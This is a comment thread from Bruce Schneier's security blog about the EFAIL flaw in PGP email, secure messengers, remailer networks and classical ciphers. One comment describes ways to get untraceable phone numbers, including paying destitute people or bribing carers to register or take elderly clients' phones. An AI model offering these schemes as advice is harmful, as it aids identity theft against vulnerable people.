As for the flack our host @Bruce is getting from some quaters, it unfortunatly happens as you become more prominent in any field of endevor. As has been noted “You can not please all of the people all of the time” so almost as self defence you say less and less, but some people will always find fault. Especially when things are fluid in how they are perceived at any given point in time. Sometimes the judicious use of quote marks in titles or articles will make it clear that there is a difference between your thinking and the perception you are commenting on, but some will still find fault, such is the nature of the variety in humans.

As I’ve explained above security is hard and maintaining the discipline to keep it requires abilities that many will fail to do for a whole heap of reasons. It’s not helped when others with financial or other incentives put preasure on people who create standards. We have seen this with the NSA and NIST and various interests such as Alphabet and W3C. I’m not sure it can be stopped but it can be called out and greater awareness raised in the general population. Thus people have some degree of choice. If you look back on this blog you will find I decided I would nolonger entertain either javascript or cookies on my Internet facing devices. At first I was told I was being a little extreme or loosing opportunities etc, even of attacking web developers… Now however with the glut of advertising malware etc more people are stopping using thr likes of javascript. As you might have seen there has been quite some pushback from various “self interested parties” who see their income being taken away from them. However the numbers using ad-blockers or just turning off javascript is rising. So awareness is starting to spread. The result has been however the arm twisting of the W3C. Whilst some will use HTML5 hopefully not just the users but web browser developers will gain awarness and take action by disabling many of the stranger HTML5 features that are major security and privacy circumventing issues.

So yes it’s a battle but atleast in some quaters the users are fighting back and winning.

Ari Trachtenberg May 16, 2018 11:06 AM

The vulnerability isn’t with PGP or S/MIME itself
Not quite … they appear to make use of the malleability in both ciphers.

Nick P May 16, 2018 4:27 PM

@ Vuln in Implementation, Not in Encryption

Nice, simple setup you had going on there. I’ll save it in my GPG collection for if I get around to doing an automation attempt. Yeah, key management is the weakest link for a lot of organizations. Least you didn’t have as much plaintext flying around or in storage. A side effect of such approaches if all secrets are encrypted/decrypted in RAM is that disk disposal is less of a problem. Just gotta make sure stuff like swap is off or itself encrypted.

@ vensi and all about Signal phone number

You all might like lattera’s trick. He sets Signal up with burner phone/SIM, gets rid of SIM, turns off cellular connection, and uses it over WiFi behind Tor network. Brilliant cheat around the problem. 🙂

Solves part of the problem anyway.

Mike Acker May 16, 2018 4:51 PM

the problem is in the e/mail RFC

if you are going to use pgp/mime there should be only 1 segment in the e/mail: the pgp/mime part.

now we have messages that contain multiple parts. this is WRONG — but — easy to fix: if there is a PGP/MIME part in the message then that should be processed as a separate message — not stitched together

Clive Robinson May 16, 2018 10:17 PM

@ Mike Acker,

now we have messages that contain multiple parts. this is WRONG

You would think so, but the fact it’s alowed in many many plaintext email systems should tell you why it also happens in ciphertext systems without thought or comment…

It’s the old notion of “least surprise” for users. Or to put it another way it’s “backwards compatability” writ large without thought to the implications of security…

As a few regular readers know I have a “bit of a bee in my bonnet” about the security issues of “backwards compatability” and this is yet another example, to add to the list of why you should not offer “backwards compatability” especially when “non standard features” are involved.

That said it’s difficult to sell a product that is not “backwards compatible” into what is a “mature market”. This is especially true of security products, users rarely see the benifit in security, because they see it as getting in the way of productivity. Likewise “marketing” know that not working the way people expect is at best a difficult sale, at worst it’s a company heading for bankruptcy.

It’s stupid, but then who would ever consider “lowest common denominator thinking” as anything but “Not very bright”…

Untill of course they meet a real issue. Such as “which side of the road you drive on?”. In the UK drivers drive on the other side of the road to Europe. The principle of “least surprise” suggests that the UK should have swapped sides to drive on… At first it appears easy to do… Then somebody mentions “busses” and then “it all goes pear shapped”… It’s an issue that those designing standards (which RFC’s are) should deal with from before day zero. But frequently they do not, hence things like “assumptions” get built in and down the road those assumptions causes real problems, that could have been avoided prior to day one. Many of the early RFC’s have this problem, which is why later RFC’s are overly complicated. Thus complexity goes up and security goes down…

Patriot May 17, 2018 2:40 AM

@ Clive Robinson

“It is becoming clear to increasing numbers of people that our information systems be it for communication, processing or storage are becoming more and more “insecure by design” at all levels in the computing stack.

It really does not matter if the insecurity is by deliberate design or the inadvertent consequences of “complexity” or more likely “usability” or some other perceived “marketing advantage” such as “speed” or “Bang for your buck”. Any insecurity once known to certain people will be used as “a crack to put the point of a wedge in”.

One of the downsides of even moderate complexity is working out where an insecurity lies and why it is insecure. This is especially difficult when “interoperability across an interface” is involved. Especially if the designers of the systems on either side of the interface are unrelated.”

Well said.

About Mr. Schneier: he is not only prominent as a cryptographer of the first rank, and as an important computer security specialist, but he is also a very good writer. I find his books on technology very informative and enjoyable to read. Moreover, something that people may not often consider is that it takes guts to be such a widely respected figure and put on the front page of your blog, “How the NSA Threatens National Security”. He’s in the front. He is benefiting the U.S. in a powerful way, in something that is really needed right now.

Why is that?

Al Qaeda wanted to attack the U.S., and they did. They killed a lot of people and did some significant physical damage. But they could not deal a death blow to the center of America’s power, which is in its law. Once the U.S. Constitution is subverted, take that how you will, then more damage will have been done to the U.S. than AQ ever hoped to do. Perhaps some U.S. leaders are benighted and they have not yet figured this out. That is why we need to talk about privacy, illegal search and seizure, trust, the bogus “Patriot Act”, free communication, agencies staying in their lanes, encryption, etc., so we do not creep into America becoming unrecognizable, a police state in which the people are no longer sovereign.

Once America goes, others will follow.

Clive Robinson May 17, 2018 3:21 AM

@ Nick P,

You all might like lattera’s trick.

It was a sensible way to go about things, other than making an occasional “Keep Alive” call.

Unfortunately most countries now have cracked down on “burner SIMs” which means it’s now harder to get your hands on one.

That said there are other ways of getting a SIM, one way is to go on holiday to a country that has not yet cracked down on them, the downside is making the “keep alive” calls. A couple of years ago the Service Providers only required one chargable call within six months, now some want them as frequently ase once every week or two.

A second trick which could be combined with the first is in effect “role a drunk” or similar, where you give someone on the bottom strater of society the price of a bottle or two of spirits to get you a pre-pay SIM using their details / ID. Most Western countries have not yet cracked down on this but no doubt they will do if they find a way that works.

But there is another way, which surprises many people in just how easy it is to do. Put simply you “buy out a contract”. There are lots and lots of people who want to “jump contracts” to get a new phone in less than two years. Some are daft enough when “second handing” their “old phone” to take a few extra quid to sell the SIM and contract on… Some can even be easily conned into it as part of the “upgrade process” and pay someone to take the old contract off their hands…

The only difficult part of all these methods is ensuring that the minimum payments go through to ensure the “keep alive” happens. Because in the UK and some other countries those numbers that are not “kept alive” are recycled increasingly more quickly these days and that could be problematic if the new number holder decides to register for the same service…

It’s this last point people realy should be aware of is that the “authorities” can grab your electronic phone number (not your hardware number / serial number) quite legaly when ever they like and that will give them access to the service…

Which brings onto a more technical attack, which is to steal an active phone number… As many people know, getting at either the “call center staff” with “social engineering” or redirecting a phone via SS7 is not as difficult as it could be.

Further on the “identity theft” and other criminal acts side of things, “borrowing an old dears phone” whilst they are in hospital etc is fairly easy to do. There is a large fairly easily recognisable demographic of people who will not use their mobile for anything other than receiving calls from relatives or “social service” providers, making a few calls or sending a few SMS messages. Thus getting control of their phone for the short period of time to use their phone to register for one of these online services will work quite easily. For instance there are a lot of people called “carers” who are on minimum wages at best who can be persuaded to “steal the phone number” for a few quid, especially if they are “agency carers” where many different carers might see one “contracted client”. There are other “social groups” as well, those at or below the “bread line” are fairly easy pray as well, then there are those who are in “relationships” where the partner gets them a nice new phone as a present etc and cons them into the contract, then uses that as a stepping stone for various levels of identity theft. This latter method has been a way for various con artists etc to get leverage to build up all sorts of scams, which are easily aided by the likes of utility companies doing “online payment” and not checking who is actually paying the bill, just as long as payment comes in…

Such tricks can also be used to “set people up” as has been seen in a couple of murder cases. Likewise those in terrorist organisations can use the techniques to setup others so they can send “bombs by UPS” and the like…

So realy the idea of seeing ID to register for a phone service only effects the “honest” and “unfortunate” the likes of petty criminals, con artists, organised crime and terrorists all know how to get around the silly rules.

Clive Robinson May 17, 2018 10:55 AM

@ Patriot,

First off, thank you for the kind words about @Bruce, I wonder if his ears will go / have gone pink when he read(s) it 😉

Once America goes, others will follow.

Sadly America appears to be playing “follow the leader” as both Australia and the UK have harsher rules currently.

Oh and the UK treats the whole world as it’s jurisdiction when it comes to electronic communication. That is under RIPA and later legislation the UK has made it clear it has the right to attack/put malware on/surveil/etc any electronic device it can reach from any UK network… Which put simply means any system they can connect to directly or indirectly say after a “black bag job” or similar…

It’s why a previous regular @Figureitout was looking into using long distance etc radio networks based around narow band low power –QRP or less– digital communications protocols like PSK31 running not on PC’s or other Common OS systems but ultimately on microcontrolers with bespoke software.

Unfortunatly due to things we do not currently understand about sun spot and other solar activity, the sun is approaching a minimum lower than we have past records for. With the result the ionosphere is not being ionised by “space weather” thus both the “Critical Frequency” and “Maximum Usable Frequency” has dropped significantly effectively closing all but a couple of the lowest amature HF bands, thus DX / Skip working is mainly non functional.

As this has a significant effect on both military and maritime communications[1] it is quite likely those in that arena will push to get access to the quite small ham/amature allocation either as the primary user or exclusive user[1].

But it gets worse, due to falling membership and other things like they arr increasingly seen as non representative, the senior ARRL lradership have been engineering both a “land and power” grab via false representation to the US FCC[2]. If they succeed they will effectively kill off most aspects of the amature ethos and freedoms. Whilst they might gain more members initially from “day boat sailors and similar” the ARRL will lose those new members fairly quickly when they wake up and realise the ARRL and certain backing interests have lied to them big time…

Thus in the US threats to your freedom to communicate can come from unexpected directions and knock you for six even before you can comprehend what the real game plan is…

Oh it’s not just Pactor where there is a hiden but lucrative commercial interest involved. Some of the digital modes use proprietary codec algorithms on which there is significant licencing fees. To prevent people avoiding this those with a significant financial interest only alow the algorithms to be hiden in silicon they produce / control. Some estimates have put this level of financial intetest at not far short of 100USD per chip. Bearing in mind you can now buy reasonable dual band VHF/UHF transceivers at as little as 20USD you can see what the financial motivation is behind this sort of behaviour…

[1] The military and maritime communications mainly use very localised “ground wave” or out to 200-600Km Near Vertical Incident Skywave (NVIS) working not DX / Skip working. NVIS working is only possible below the Critical Frequency, thus with that down to the very bottom of the HF band means that they will be looking for any capacity they can grab below 1.5-7MHz which covers the amature 160, 80 and 40 meter bands. Further due to the size needed for the antennas 40/20/10 meters their current 4meter whips are grossly inefficient, thus they will want all other users out of those bands… As both the military and marine interests can claim direct or secondary “National Security” the chances are if pushback does not start before they do, then they will win any argument…

[2] Worse the ARRL are upto some quite harmful shenanigans with the FCC. Put simply on the quiet they have claimed to represent all amatures whether US or not, and have proposed turning nearly all the amature HF allocation into “wideband data usage”. Whilst this appears at first to be begin it is far from it. It’s being pushed by certain self interested parties behined the use by royalty only PACTOR for WinMail. Idiot dayboat sailors have been promissed that if they get a basic licence they will be able to use it for free rather than pay as they currently do quite high fees for a very small data allocation. To see just how much of an idiot these dayboat sailors are some are on record as saying how it will alow them to do streaming media and other very high data use such as web browsing. That is they do not realise just how long it would take at 960bytes/sec to download the average web page at three MegaBytes… Worse the way the WinMail and similar nodes work they will be regarded as “automatic” which means they get the same “clear channle” rules as VHF and UHF repeaters, which means that an entire full bandwidth channel has to be reserved at the maximum working range… Which due to rules peculiar to the FCC and US Gov they effectively reserve the channels world wide, as other countries amatures are not alowed to use WinMail or similar Internet service or they will not be alowed to work maritime mobile. As I said the ARRL who do not even represent the majority of US Hams tried to do this land/power grab via the FCC on the quiet. However one senior member of the ARRL tried to go public and was immediately suspended vilified behind their back and threatened with significant legal consequences if they even tried to defend their good name… So the current seniors in the ARRL appear to not be the sort of people who represent anyone other than their own self interest…

lwb May 17, 2018 1:48 PM

“if you are going to use pgp/mime there should be only 1 segment in the e/mail: the pgp/mime part.”

One case where I might want it to be otherwise is if I’m forwarding several separate PGP messages to someone (inside an encrypted container, or attached to a plaintext message). Maybe I don’t even have the private key on the computer holding those messages. Treating them as separate messages would be as expected.

“The principle of ‘least surprise’ suggests that the UK should have swapped sides to drive on… At first it appears easy to do… Then somebody mentions ‘busses’ and then ‘it all goes pear shapped’.”

Search for “H-day” if you don’t already know it. The phaseout of petrol vehicles, including busses, will give the UK another chance to switch.

Ruby May 18, 2018 1:27 AM

Multiple people have advised their readership to stop using email and PGP and use Signal instead. This isn’t very helpful for people who don’t use a smartphone (which Signal requires).

What should they use for confidential communication?

Tune May 18, 2018 2:06 AM

I don’t think the issue is with HTML rendering per se, but with the HTML referencing non-local resources. Rendering a PNG or JPEG in multipart attachment should not be a problem, but why having your mail client blindly fetching remote contents is always leaking information. This is a problem with unencrypted email too, for instance with tracking pixels in brute force spam attempts. The only trusted origin for email should be the email itself; and in case of encrypted email it should be only the encrypted (or at least authenticated) parts.

Michael Thomas May 18, 2018 4:50 AM

” If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.”

No, absolutely not. With bot I don’t have any key on my own. I have to trust the programmer. It’s like to rent a house and every time I want to get in another person open and close the door for me. Yes, it’s comfortably but not secure. Do I know if the person let somebody else in the house?

On the other side: I don’t use WhatsApp or Signal. I use Threema (partly and not with the feeling to be secure). If I want to send a message to a Signal or WhatsApp user somebody has to transfer it (that means: copy and paste). Not very secure and absolutely “19th century telephone using”.

We are in the 21st century and we have the technology to communicate without company or state borders. We can use e-mail, xmpp/jabber and matrix as an open implementation. Of course, to be free in a democracy manner you have to do something to be not in a golden cage of a “door opener with your private key”.

Clive Robinson May 18, 2018 5:12 AM

@ Ruby,

What should they use for confidential communication?

Sorry wrong question due to an incorrect assumption on your behalf.

The first thing you should ask is “What do I mean by confidential?”. Which normally gets broken down to message content (data) and message routing (metadata). During WWII two people at Bletchly Park became influential on the way our modern communications networks work and the associated deliberately inbuilt security flaws.

Currently whilst it is possible to get message content “data confidentiality” by careful use of a limited set of codes and ciphers, it’s not possible to have message routing “metadata confidentiality” on publicaly accessable comercial networks.

That is “traffic analysis” of routing and other aspects of metadata over time reveal much more information than individual message content data.

Even Tor is fairly ineffective at dealing with “traffic analysis” due to it’s very inneffective basic design (what do you expect from a US Gov intelligence agency freebie…).

That is not to say that Tor or “mix-net” could not be fixed. I’ve made this point quite a number of times in the past including what changes would be required. To stymie traffic analysis by SigInt and LE Agencies from the current “collect it all” techniques they use. And in the process force SigInt agencies to use their resources vastly differently, back into the way they had to when “collect it all” was not yet technically feasable.

So your assumption that “confidentiality” is available to the general public is currently incorrect…

Thus the question becomes “What do you as an individual intend to do to change the current situation?”, that is “Realy just how important is confidentiality to you, and what lengths are you prepared to go to too get it?”.

Sorry to sound nasty, I’m not intending to do so. But having had my nose up close to the grind stone on developing confidential systems, the reality is nobody is prepared to put their money on the table, untill after the brown stuff has hit the indistrial blower big style. Which means that the resources that might give everybody increased confidentiality, instead get to fill the endless black holes of the coffers of our legal bretherin, who like sharks are always circling in an opportunistic manner to capitalise on weakness and distress…

At the end of the day resources are finite, you and everybody else has to chose –where they can– what you will use your limited resources on…

Clive Robinson May 18, 2018 6:22 AM

@ Tune,

I don’t think the issue is with HTML rendering per se, but with the HTML referencing non-local resources.

Whilst that is true from a 20,000ft view, HTML does not render, it subs it out to the web browser develiper to either build in or attach to code that does, either by an Inter Process Communications (IPC) process or by linking to a third party code library. Following a URL has always been an inbuilt function of the HTML interpreter, designed to be fully built into the browser core functionality.

That is HTML used to seperate function and method, for quite valid reasons. Thus viewing rich content –such as PDFs and images– or using a programable languages were entirely seperate, fully removable or replacable, which is a major security advantage. W3C however under preasure from less than trustable entities has pulled more and more methods into HTML than should be there. HTML5 is extraordinarily bad in this respect, thus a security nightmare that will haunt us for atleast the next decade or two…

Thus the inability to remove a method and it’s complexity is a major security failing. Worse as you note such failings have likewise been draged into Email clients (MUAs) to the detriment of security.

The major issue is “confidentiality” in both content (data) and associated functioning (metadata). Whilst encryption “could” give data confidentiality via the use of PGP or any other encryption, as you note with any Email client that supports core HTML functionality will always leak metadata.

Unless the user client designers and developers alow the users to turn the linking functionality off. Which many users are now realising is getting close and closer to being impossible, due to the W3C, browsers and developers having major dependencies on those who are less than trustworthy…

Thus we are now very much in the trap of “He who pays the piper, calls the tune” distopia of the giant privacy abusers such as Alphabet/Google, Facebook et al.

Whilst on the face of it FOSS gives the potential for “freedom” and “privacy” the reality is for “pocket fluff change” we’ve all been converted into “commodities” by the less than trustworthy…

Which just leaves the pertinent question for the few of “How do we get out from this trap?” the answers to which will almost be thwarted by the masses who want “free lunch baubles, bells and whistles” with no consideration as to what the ultimate price realy is…

We thus have a new “Opiate for the masses” that as with the original opium triangle, just exploits over and over at an almost incalcuable cost to society…

Yup it sounds depressing, but the reality is as we can see the death toll of social media is rising faster than the rate of new users joining… Which does not bode well for the future…

mark May 18, 2018 8:08 AM

Why do you recommend WhatsApp?

Isn’t that read by Facebook and transmitted to state officials?

Alyer Babtu May 18, 2018 2:36 PM


Unless the user client designers and developers alow the users to turn the linking functionality off

Could a browser limited to essentially pure text, perhaps with a provision to render the graphic content of pictures/images, and also including secure commercial transaction capability, function today ?

I recall how amazingly more efficient in machine execution and human comprehension pure text browsers were. Page and link structure immediately apparent.

Text with judicious addition of images is a proven technology with a multi-thousand year track record.

Clive Robinson May 18, 2018 6:29 PM

@ Alyer Babtu,

Could a browser limited to essentially pure text … function today ?

Short answer the oldest web browser still in production “lynx” does, and a week ago the developers released the latest test release.

Long answer is it’s less the browser capability, and very much more page garbage content dependent. With worse than code cutters masquerading as web developers they realy can write the worst code imaginable in your worst nightmare. Some is not just “write only” code you can tell it’s been scraped from a number of stack exchange posts without any kind of understanding…

But they get worse, a lot worse than that… for instance I have javascript disabled by default in my browser, you would be amazed at just how many web sites do absolutly nothing not even an error message, just a blank white page or worse go download code crazy via an infinite regression of re-directs (Rupert Merdoch newspapers being some of the worst of the worst)… Such coding is not just incompetant it’s negligent beyond doubt and most definatly brings the organisation into disrepute which is normally a sacking offence.

But still worse it gets, I can remember a time when people were getting worried about web pages due to the average length crossing the 10KByte size. Now the average is over 3MegaBytes, and the actuall textual content for humans has dropped below 1KBytes…

But to prove how bad those web designers are we can compare their work against the web pages of this blog. This blog does not need either javascript or cookies enabled buy the user. Last time I checked it they did not load code in just by displaying one of the mega corp buttons. More importantly these pages still function as most users would expect. Mostly quickly and efficiently with a lack of errors, but importantly error messages are included where needed. That is these pages are as you would not just like but should expect as a minimum by defaukt, that is they cause “least supprise” for a user.

I’ve not tried it, but I’ve been told these pages also work via Lynx both via the user interface and via the CLI / scripting interface…

echo May 21, 2018 12:39 PM

@Clive Robinson

Yes, I have noticed these things too. I suspect the Windows code base and most beaurocracies function along similar lines.

One day I will learn to spell “bureaucracy” correctly.

RockLobster May 24, 2018 11:28 AM

Here is a warning for everyone using public key encryption.

I’m going to give you a scenario.
If you were big brother and you knew the cipher text itself is secure and the only known attacks against public key encryption were against the public key itself what would you do?

Common sense would say coerce users of public key encryption into uploading their public keys to a database so should we wish to target any individual we can easily retrieve their public key and work on cracking it. Also try to prevent the public using public keys so large that they are not crackable.

So now let’s consider the implementation of public key encryption PGP OpenKeyChain etc what do they advise to do regarding that.
Well surprise surprise, none of them advise to keep your public key secure and only share it with those you communicate with.
They all advise linking your public key to your name and email address and uploading it to public key servers.

I was recently reading forum posts about OpenKeyChain, someone said soon they will be making the uploading of keys to key servers mandatory.
Then on the issue tracker I read that when the user unchecked the option to upload new keys to key server, OpenKeyChain rechecked it by itself and uploaded them regardless.
Then I read discussions by the developers about removing the option to create large RSA keys, bigger than 4096 bit, which they did.

For the above reasons I strongly suspect at least one of the developers is working for big brother.
My advice is, use a publicly published public key for introductory purposes only, then switch to using large public keys that are kept offline and encrypted and only share them with those you communicate with and replace them often.
Ideally the public keys should be shared while encrypted and the password shared by other means.

Ron Dam May 27, 2018 10:36 AM

@ Clive Robertson.

You’re right, the core question is what confidentiality really means.

As you already mentioned, confidentiality isn’t only about conceiling a message’s payload. It’s even more important to hide the indentity of sender and recipient. The simple reason why WhatsApp finally followed the user’s mood and implemented end-to-end encryption – It’s all about meta data, about building a sociogram of world-wide population. And we, the users, settle back enjoying some obscure undisclosed encryption implementation and still accept the upload of our address books and tracing of our transactions unchallenged.

As neither Signal nor WhatsApp support anonymous communication, that’s not the way to go. Now, more than ever before, we need decentralized mail messaging, not the concentration of a few servers run by Whisper Systems and FaceBook, which is easily interceptable by privacy opponents. It’s stupid to think accounts bound to phone numbers can remain anonymous for a longer period of time. Mobile phone tracking may immediately reveal your identity.

Talking about

Tor or “mix-net”

you wrote

So your assumption that “confidentiality” is available to the general public is currently incorrect…

which I think isn’t correct. Sure, Tor has to provide low latency prone to correlation attacks, which indeed is a problem. But what’s wrong with high latency mix networks like Mixmaster?

There’s unrestricted code transparency from the Mixmaster server up to the client side OmniMix proxy. You can send messages through the integrated Tor subsystem without anyone having a chance to notice it. And those in need of an anonymous reply channel may create an account at a nym server.

Of course to get maximum security a packet filter has to disconnect gabby MUAs from the internet only allowing them to communicate through the local proxy server.

So, as core PGP/GPG is in no way broken, and an infrastructure for secret conventional mailing is publicly available, I was startled by Bruce Schneier recommending Signal and WhatsApp.


@ gmgj

A little off topic, but, I would be really happy if a few really smart guys got some backing to do a new email framework, standard, what you may call it along with some open source libraries.

MIME encoding itself is already very complex and implementation challenging. Now add partial encryption, HTML processing, possibly some further active contents and there no longer is a chance to prevent the dam from busting. That’s where we are now.

But what’s the reason why single message parts have to be encrypted one by one? Isn’t it much more robust to encrypt the message as a whole, hiding and by doing so protecting the integrity of its complete contents and structure, including header and body section, which is what the aforementioned Mixmaster proxy does? I think we have to return to the KISS principle instead of making message processing more and more complex and unpredictable.

Let the MUA build the MIME message, then strip off all revealing header data, encode the result and send that single PGP block to the recipient(s). That’s easy, that’s transparent, that’s what we need.

Clive Robinson May 27, 2018 7:13 PM

@ Ron Dam,

But what’s wrong with high latency mix networks like Mixmaster?

Some years ago I looked at TypeII and TypeIII anonymous remailer systems but they appeared to have been abandoned by their developers. Which is why I said not currently.

I just had another look and it appears that the last releases of both Mixmaster and Mixminion are over a decade old…

If you know of more current anonymous remailers can you post a link?

Ron Dam May 28, 2018 6:57 AM

@ Clive Robertson

Well, former Mixmaster sites @ SourceForge ( and, which still apear on top of search engine listings, were abandoned years ago. They should have added remarks to make that situation clear and point prospective users to the active development branch.

Now “Elvis” / “Merkin Muffley” and Steve Crook / “Zax” maintain the Mixmaster source code and upgraded it from 1k to 4k RSA encryption (

Steve Crook’s GitHub repository also holds nym server sources (ghionym and nymserv).

Nowadays the Mixmaster network runs in hybrid mode with maximum chain lengths ranging from 10 (4k only) up to 20 remailer hops (1k only) with currently 15 worldwide deployed Mixmaster remailers being active. Anonymous mailboxes are available at, (ghionym / Ghio style) and (nymserv / Zax style).

Apart from Linux scripts for automation there’s the OmniMix SMTP/POP3/NNTP proxy server running on Windows and the much simpler Quicksilver Lite Windows GUI.

Remailer topics are discussed at the alt.privacy.anon-server newsgroup. That’s where you find the maintainers of all the tools I mentioned.

IMO the Mixmaster network is the most secure system for anonymous communication we currently have.

Clive Robinson May 28, 2018 2:45 PM

@ Ron,

First off you have my surname wrong…

Second it’s odd you should mention the name “Steve Crook” in fact it is a bit of a srprise. It’s not a very common name, and I only know of two that are also developers of communications code.

The first used to work at a University I worked at and when I moved I setup the opportunity for him to work at a new company I worked at then in London, and he was still working there long after I was gone.

The other developer lives in St Mellion and was a parish councilor there that was involved with the rejection of a Solar Farm application. Solar energy systems being a previous “special interest” of mine I ran into his paperwork though not him, and various organisations had profiled him and the other councillors as at the time Cornwall being in the far South West of the UK was ideal for “alternative energy” sites due to both wind and sunshine.

I will have a look at the newer software and see how many points it scores not just on information confidentiality, but also meta-data confidentiality from the likes of traffic analysis.

Lio Fralop June 2, 2018 6:44 PM

Use Signal or Whatsapp? Are you kidding? “Reliably and easily encrypting e-mail is an insurmountably hard problem”? Only a Sith deals in absolutes, Bruce.

nipper June 6, 2018 1:55 AM

Call me old fashioned, but from my cypherpunk days c.1993, I use nyms and the type II mixmaster network.

Robert Scott May 21, 2019 6:51 PM

All of the comments I have read don’t discuss the very best form of encryption, for two entities to communicate securely, whether using electronic communications or the plain old snail mail.

Now this is OLD spycraft, but it has never been broken unless one or the other party has their property seized and some nitwit marked a page of the key book.

Gideons Bibles for instance are in every motel room across most of the western world. similarily their are other commonly available, exactly duplicated, books in libraries.

Two entities agree on a series of books that they enjoy reading, perhaps one book for each day of a week, or even each day of a month. An ordinary message header in an email might look like and even discuss a citation from a book which is NOT one of the ones chosen as a Key Book. The key is a paragraph of text, with just the first or second or third letter from each word being used to create a One-time-Pad to encrypt an email message before it is ever entered into the email application. This pattern is never repeated, which means both entities have to have half a clue, but they should because they are working in a dangerous realm otherwise why worry about encrypting emails in the first place?

You write up your message, avoiding EVER reusing a phrase that may be known to be used by either entity. For instance ‘Heil Hitler’ at the end of every cyphered message sent by the Germans during WWII. You know that it is there, and you know what it says, so now reverse the key from the pattern. Don’t sign the message in any way with a pattern like ‘Sincerely Yours’ or other garbage like it, it creates a known pattern at a known position in the message, therefore you can reverse the key. Even telegrams with ‘Message Ends XXX’ is stupid.

Anyway, you never carry the Key Book or books in your baggage. You check out the book from a library along with 2 or three others completely unrelated to your messaging system. You encode a message with the book and citation unrelated to the real book you are using so that throws off the scent. You decode any message in the same (yes cumbersome) way. Magazines that are at newstands can also be used, but only ones that don’t change their publication for different regions, but only publish one version.

If you are working against authoritarian regimes and up against the best signals intelligence services in the world, you have to think about what method of secure communications worked in the past and were never beaten unless a mistake was made, like being seen meeting with someone already under suspicion by the authoritarian regime, and then being caught in possession of one of the key books, which is why I mentioned books and magazines readily available.

Yes it is cumbersome, but one-time-pads have never been broken.

Weather May 21, 2019 11:12 PM

Robert Scott
A book isn’t the right thing to use, alphabet syntax like a u after a q and ,this is, or ,this might, have enough pattern to narrow down a lot, look at a dictionary and the first and second letter of each word can remove a lot from a bruteforce search to make a dictionary attack, plus there is 256 bandwidth for communication but you are only using 26 , some processing of the text to random is needed before you substitute.

Anna Williams January 15, 2020 12:20 AM

Hi Mr. Sneier,

If an organization wants to get a secure email service set up so that they can transmit classified messages securly via e-mail, as an alternative to PGP, what do you recommend? Or would you recommend PGP combined with other network hardenning techniques? I am envisioning using VPN for sure just to connect to the network…if it were a remote site.

A while back I was reading the whitepaper for the encryption protocols for whatsapp. I did not know they were opensource. Maybe that protol suite can be applied to a secure email service. Thoughts?



Clive Robinson January 15, 2020 7:01 AM

@ Robert Scott,

Yes it is cumbersome, but one-time-pads have never been broken.

The single book “running key” polyalphabetic cipher you describe is most certainly not a “One Time Pad” and never has been. It’s statistics are not at all random because the multilevel nature of the redundance in written language. Worse the actuall key space whilst appearing insumountably large to a human is actually relatively small for modern computers. That is 100million books is only 2^27 with due to human failings probably only 2000 start points (page,paragraph) per book, giving only a key space of a paltry 2^38. Worse you don’t have to brut force them because you can “chunk” common combinations of words and run them against the ciphertext. The chunks acting like one to several indexes, thus significantly reducing the search space.

Thus the usual form of just using a starting position in a book and writing it out to use as the key usually fails to an automated Chi-Squared test against such a “cannon of known text”.

The problem is that the statistics hold for not just plain text but “sampled plaintext” as well and are fairly well known and consistent. That is regular sampling of words by character position has a fairly clear statistical profile. Realistically because words are fairly short the number of sampling stratagies is very limited (maybe four bits equivalent). So the keystream search space is likely to be within 2^42 and searching reduced significantly by chunking (especially if the base chunks can all be held in fast memory such as CPU cache).

Such “chunking” which human cryptanalysists do is why the use of statistical flatterning by a simple look up table (straddling checkerboard[1]) to convert the plain text character by character to a single or double digit number was used by many of the Nihilist Ciphers including VIC (which did remain unbroken at the time of it’s use 1953-1957, whilst the One Time Pad did not see Project VENONA, which is the reason to use other ciphers in the process as well).

Back in the 1980’s, when computing power and storage were considerably less than they are today, it was suggested that using four books to generate the running key was probably sufficient. First converting them to numbers by four different straddling checkerboards would certainly increase the fractionation and suppress the statistics of the language but it would be a lot of work and very likely to be subject to errors.

Thus if you are going to use book derived running key ciphers it would be best to perform a transposition of reasonable size in the process as it would make brut force keyspace search reduction techniques such as “chunking” much less likely to work. One advantage is that as with all stream ciphers the key stream is independent of the message being sent, the transposition can be done in an irregular manner, that is by using in effect a grid where around 10% of the grid squares are not used in a key dependent fashion. In effect making a ten character transposition into one around ninety befor the pattern repeates. If this is done before using the straddling checkerboard the fractionation will make the actuall transposition size harder to find.

[1] The straddling checkerboard for most languages that use a lattin alphabet uses a three line by ten character long grid, rather than a five by five or six by six of a Polybius square. Importantly the eight most frequent letters of the alphabet go the top line with two grid spaces left empty. The other eighteen members of the alphabet and two “special” charecters are writen in the bottom two rows. The positioning of the individual characters is “key dependent”. The digits 0-9 lable all the grid columns, the top row is not numbered and the bottom two rows are numbered with the column numbers of the two blank grid squares in the top row. The plaintext charecters are converted to one or two digit numbers. If a character is in the top row only it’s column number is written down, if it is in either of the other two rows both the row and column number are written down. This has the advantage not just of simultaneously achieving fractionation but also slightly compressing the plaintext, thus raising its unicity distance. Depending on how the following cipher steps work the fractionation can lead to good diffusion and confusion, the two points Claude Shannon emphasised as being critical to the strength of a cipher.

whatever October 4, 2020 12:34 AM

whatsapp collects metadata and even signal is centralised. PGP is great because its decentralised and has completely seprate purposes.

Leave a comment


Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via

Sidebar photo of Bruce Schneier by Joe MacInnis.